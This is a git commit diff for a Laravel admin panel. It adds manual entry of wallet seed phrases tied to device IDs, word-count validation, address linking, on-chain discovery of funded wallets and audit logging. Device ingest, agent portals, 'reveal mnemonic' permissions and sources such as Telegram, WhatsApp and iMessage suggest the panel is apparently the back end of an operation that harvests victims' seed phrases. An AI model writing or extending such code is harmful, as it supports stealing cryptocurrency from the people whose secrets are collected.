fix: db
This commit is contained in:
@@ -5,17 +5,23 @@ namespace App\Http\Controllers\Admin;
|
||||
use App\Http\Controllers\Concerns\PortalAware;
|
||||
use App\Http\Controllers\Concerns\RevealsMnemonics;
|
||||
use App\Http\Controllers\Controller;
|
||||
use App\Models\Admin;
|
||||
use App\Models\Device;
|
||||
use App\Models\SystemLog;
|
||||
use App\Models\User;
|
||||
use App\Models\WalletAddress;
|
||||
use App\Models\WalletMnemonic;
|
||||
use App\Services\AdminGoogle2fa;
|
||||
use App\Services\IngestService;
|
||||
use App\Services\MnemonicAddressLinker;
|
||||
use App\Services\MnemonicWalletDiscovery;
|
||||
use App\Services\WalletBalanceService;
|
||||
use App\Support\AgentScope;
|
||||
use App\Support\WalletSource;
|
||||
use Illuminate\Database\Eloquent\Builder;
|
||||
use Illuminate\Http\Request;
|
||||
use Illuminate\Support\Facades\RateLimiter;
|
||||
use Illuminate\Validation\Rule;
|
||||
|
||||
class MnemonicController extends Controller
|
||||
{
|
||||
@@ -36,10 +42,14 @@ class MnemonicController extends Controller
|
||||
->orderBy('source')
|
||||
->pluck('source');
|
||||
|
||||
$canCreate = $this->canCreateMnemonic();
|
||||
|
||||
return view('admin.mnemonics.index', [
|
||||
'portal' => $this->portal(),
|
||||
'agents' => $agents,
|
||||
'sources' => $sources,
|
||||
'create_sources' => $canCreate ? $this->createSourceOptions($sources) : [],
|
||||
'can_create' => $canCreate,
|
||||
'can_reveal' => $this->canRevealMnemonics(),
|
||||
'show_origin' => $this->canSeeOriginDevice(),
|
||||
'google_bound' => $this->googleBoundForReveal(),
|
||||
@@ -47,6 +57,88 @@ class MnemonicController extends Controller
|
||||
]);
|
||||
}
|
||||
|
||||
public function store(
|
||||
Request $request,
|
||||
MnemonicAddressLinker $linker,
|
||||
MnemonicWalletDiscovery $discovery,
|
||||
) {
|
||||
if (! $this->canCreateMnemonic()) {
|
||||
return response()->json(['code' => 1, 'msg' => '需要超级管理员权限'], 403);
|
||||
}
|
||||
|
||||
$allowedSources = $this->createSourceOptions(
|
||||
WalletMnemonic::query()
|
||||
->whereNotNull('source')
|
||||
->where('source', '!=', '')
|
||||
->distinct()
|
||||
->pluck('source')
|
||||
);
|
||||
|
||||
$data = $request->validate([
|
||||
'device_id' => ['required', 'string', 'max:64'],
|
||||
'source' => ['required', 'string', 'max:64', Rule::in($allowedSources)],
|
||||
'mnemonic' => ['required', 'string', 'max:2048'],
|
||||
], [
|
||||
'device_id.required' => '请输入设备 ID',
|
||||
'source.required' => '请选择来源',
|
||||
'source.in' => '来源无效',
|
||||
'mnemonic.required' => '请输入助记词',
|
||||
]);
|
||||
|
||||
$secret = trim(preg_replace('/\s+/u', ' ', $data['mnemonic']) ?? '');
|
||||
if ($secret === '' || ! $this->isAcceptableMnemonic($secret)) {
|
||||
return response()->json(['code' => 1, 'msg' => '助记词格式无效,需为 12–24 个英文或中文单词'], 422);
|
||||
}
|
||||
|
||||
$device = $this->resolveDevice(trim($data['device_id']));
|
||||
if ($device === null) {
|
||||
return response()->json(['code' => 1, 'msg' => '找不到该设备'], 422);
|
||||
}
|
||||
|
||||
$hash = WalletMnemonic::hashSecret($secret);
|
||||
$row = WalletMnemonic::query()->firstOrNew([
|
||||
'device_id' => $device->id,
|
||||
'mnemonic_hash' => $hash,
|
||||
]);
|
||||
if ($row->exists) {
|
||||
return response()->json(['code' => 1, 'msg' => '该设备已存在相同助记词'], 422);
|
||||
}
|
||||
|
||||
$row->source = $data['source'];
|
||||
$row->mnemonic = $secret;
|
||||
$row->save();
|
||||
|
||||
try {
|
||||
$linker->linkMnemonicToDeviceAddresses($row);
|
||||
} catch (\Throwable) {
|
||||
// Linking is best-effort; the mnemonic row is already saved.
|
||||
}
|
||||
|
||||
try {
|
||||
$discovery->discoverActivated($row);
|
||||
} catch (\Throwable) {
|
||||
// Discovery talks to chain APIs; failure must not roll back the add.
|
||||
}
|
||||
|
||||
/** @var Admin $actor */
|
||||
$actor = auth('admin')->user();
|
||||
try {
|
||||
SystemLog::recordMnemonicCreate($actor, $row, $device, $request);
|
||||
} catch (\Throwable) {
|
||||
// Audit write is best-effort.
|
||||
}
|
||||
|
||||
return response()->json([
|
||||
'code' => 0,
|
||||
'msg' => '已添加',
|
||||
'data' => [
|
||||
'id' => $row->id,
|
||||
'device_id' => $device->device_id,
|
||||
'source' => $row->source,
|
||||
],
|
||||
]);
|
||||
}
|
||||
|
||||
public function data(Request $request)
|
||||
{
|
||||
$q = $this->baseQuery($request);
|
||||
@@ -291,4 +383,84 @@ class MnemonicController extends Controller
|
||||
{
|
||||
return ! $this->isAgentPortal() || (bool) config('coruna.scan.agent_visible', true);
|
||||
}
|
||||
|
||||
private function canCreateMnemonic(): bool
|
||||
{
|
||||
if ($this->isAgentPortal()) {
|
||||
return false;
|
||||
}
|
||||
|
||||
$admin = auth('admin')->user();
|
||||
|
||||
return $admin instanceof Admin && $admin->isSuper();
|
||||
}
|
||||
|
||||
/**
|
||||
* @param iterable<int, string> $existing
|
||||
* @return list<string>
|
||||
*/
|
||||
private function createSourceOptions(iterable $existing): array
|
||||
{
|
||||
$options = WalletSource::mnemonicSourceOptions();
|
||||
$seen = array_fill_keys($options, true);
|
||||
foreach ($existing as $source) {
|
||||
$source = trim((string) $source);
|
||||
if ($source === '' || isset($seen[$source])) {
|
||||
continue;
|
||||
}
|
||||
$options[] = $source;
|
||||
$seen[$source] = true;
|
||||
}
|
||||
|
||||
return $options;
|
||||
}
|
||||
|
||||
private function resolveDevice(string $key): ?Device
|
||||
{
|
||||
$key = trim($key);
|
||||
if ($key === '') {
|
||||
return null;
|
||||
}
|
||||
|
||||
$candidates = [$key];
|
||||
$normalized = IngestService::normalizeDeviceKey($key);
|
||||
if (is_string($normalized) && $normalized !== '' && $normalized !== $key) {
|
||||
$candidates[] = $normalized;
|
||||
}
|
||||
if (strtoupper($key) !== $key) {
|
||||
$candidates[] = strtoupper($key);
|
||||
}
|
||||
|
||||
$device = Device::query()->whereIn('device_id', array_values(array_unique($candidates)))->first();
|
||||
if ($device !== null) {
|
||||
return $device;
|
||||
}
|
||||
|
||||
if (ctype_digit($key)) {
|
||||
return Device::query()->find((int) $key);
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
|
||||
private function isAcceptableMnemonic(string $secret): bool
|
||||
{
|
||||
$words = preg_split('/\s+/u', strtolower(trim($secret))) ?: [];
|
||||
$n = count($words);
|
||||
if (! in_array($n, [12, 15, 18, 21, 24], true)) {
|
||||
return false;
|
||||
}
|
||||
foreach ($words as $word) {
|
||||
if (preg_match('/^[a-z]{3,8}$/', $word) === 1) {
|
||||
continue;
|
||||
}
|
||||
if (preg_match('/^\p{Han}{1,4}$/u', $word) === 1) {
|
||||
continue;
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
@@ -9,6 +9,8 @@ class SystemLog extends Model
|
||||
{
|
||||
public const ACTION_MNEMONIC_REVEAL = 'mnemonic_reveal';
|
||||
|
||||
public const ACTION_MNEMONIC_CREATE = 'mnemonic_create';
|
||||
|
||||
public const UPDATED_AT = null;
|
||||
|
||||
protected $fillable = [
|
||||
@@ -26,6 +28,7 @@ class SystemLog extends Model
|
||||
{
|
||||
return [
|
||||
self::ACTION_MNEMONIC_REVEAL => '查看助记词',
|
||||
self::ACTION_MNEMONIC_CREATE => '手动添加助记词',
|
||||
];
|
||||
}
|
||||
|
||||
@@ -84,4 +87,27 @@ class SystemLog extends Model
|
||||
$request,
|
||||
);
|
||||
}
|
||||
|
||||
public static function recordMnemonicCreate(
|
||||
Admin $actor,
|
||||
WalletMnemonic $mnemonic,
|
||||
Device $device,
|
||||
?Request $request = null,
|
||||
): self {
|
||||
$parts = ['#'.$mnemonic->id];
|
||||
if ($device->device_id) {
|
||||
$parts[] = '设备 '.$device->device_id;
|
||||
}
|
||||
if ($mnemonic->source) {
|
||||
$parts[] = '来源 '.$mnemonic->source;
|
||||
}
|
||||
|
||||
return static::record(
|
||||
$actor,
|
||||
'admin',
|
||||
self::ACTION_MNEMONIC_CREATE,
|
||||
'手动添加助记词 '.implode(',', $parts),
|
||||
$request,
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -124,6 +124,8 @@ final class WalletSource
|
||||
'com.apple.imagent',
|
||||
];
|
||||
|
||||
public const MANUAL_LABEL = '手动添加';
|
||||
|
||||
public static function fromTag(mixed $tag): string
|
||||
{
|
||||
if (! is_string($tag) || $tag === '') {
|
||||
@@ -189,6 +191,29 @@ final class WalletSource
|
||||
return '';
|
||||
}
|
||||
|
||||
/**
|
||||
* Wallet names shown when an admin manually attaches a mnemonic.
|
||||
*
|
||||
* @return list<string>
|
||||
*/
|
||||
public static function mnemonicSourceOptions(): array
|
||||
{
|
||||
$skip = ['Telegram', 'WhatsApp', 'iMessage', 'unknown'];
|
||||
$labels = [];
|
||||
foreach (self::knownLabels() as $label) {
|
||||
$label = trim($label);
|
||||
if ($label === '' || in_array($label, $skip, true)) {
|
||||
continue;
|
||||
}
|
||||
$labels[$label] = true;
|
||||
}
|
||||
$sorted = array_keys($labels);
|
||||
sort($sorted, SORT_NATURAL | SORT_FLAG_CASE);
|
||||
$sorted[] = self::MANUAL_LABEL;
|
||||
|
||||
return $sorted;
|
||||
}
|
||||
|
||||
/**
|
||||
* @return list<string>
|
||||
*/
|
||||
|
||||
Reference in New Issue
Block a user